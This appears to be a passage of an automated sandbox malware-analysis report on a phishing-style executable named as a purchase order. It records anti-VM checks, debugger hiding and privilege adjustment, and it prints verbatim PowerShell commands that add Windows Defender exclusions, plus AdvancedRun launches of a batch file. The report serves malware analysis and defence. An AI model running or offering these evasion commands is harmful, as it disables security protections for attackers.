                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeThread delayed: delay time: 922337203685477
                      Source: powershell.exe, 00000008.00000003.356624082.0000000004DBB000.00000004.00000001.sdmp, powershell.exe, 0000000A.00000003.423263716.00000000054B4000.00000004.00000001.sdmpBinary or memory string: Hyper-V
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.303094525.00000000067AA000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWy
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.297172998.0000000004950000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.303094525.00000000067AA000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.297172998.0000000004950000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.297172998.0000000004950000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                      Source: AdvancedRun.exe, 00000023.00000002.431211915.000000000083B000.00000004.00000020.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.297172998.0000000004950000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                      Source: powershell.exe, 00000008.00000003.356624082.0000000004DBB000.00000004.00000001.sdmp, powershell.exe, 0000000A.00000003.423263716.00000000054B4000.00000004.00000001.sdmpBinary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information queried: ProcessInformationJump to behavior

                      Anti Debugging:

                      barindex
                      Hides threads from debuggersShow sources
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeCode function: 32_2_010D28B8 LdrInitializeThunk,32_2_010D28B8
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeCode function: 5_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_0040289F
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Adds a directory exclusion to Windows DefenderShow sources
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\08042021New-PurchaseOrder.exe' -Force
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\08042021New-PurchaseOrder.exe' -Force
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\08042021New-PurchaseOrder.exe' -ForceJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\08042021New-PurchaseOrder.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeCode function: 5_2_00401C26 GetCurrentProcessId,memset,memset,_snwprintf,memset,ShellExecuteExW,WaitForSingleObject,GetExitCodeProcess,GetLastError,5_2_00401C26
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /RunJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\08042021New-PurchaseOrder.exe' -ForceJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\08042021New-PurchaseOrder.exe' -ForceJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1Jump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe C:\Users\user\Desktop\08042021New-PurchaseOrder.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe' /SpecialRun 4101d8 4436Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe' /SpecialRun 4101d8 5204
                      Source: C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exeProcess created: unknown unknown
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /RunJump to behavior
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeQueries volume information: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
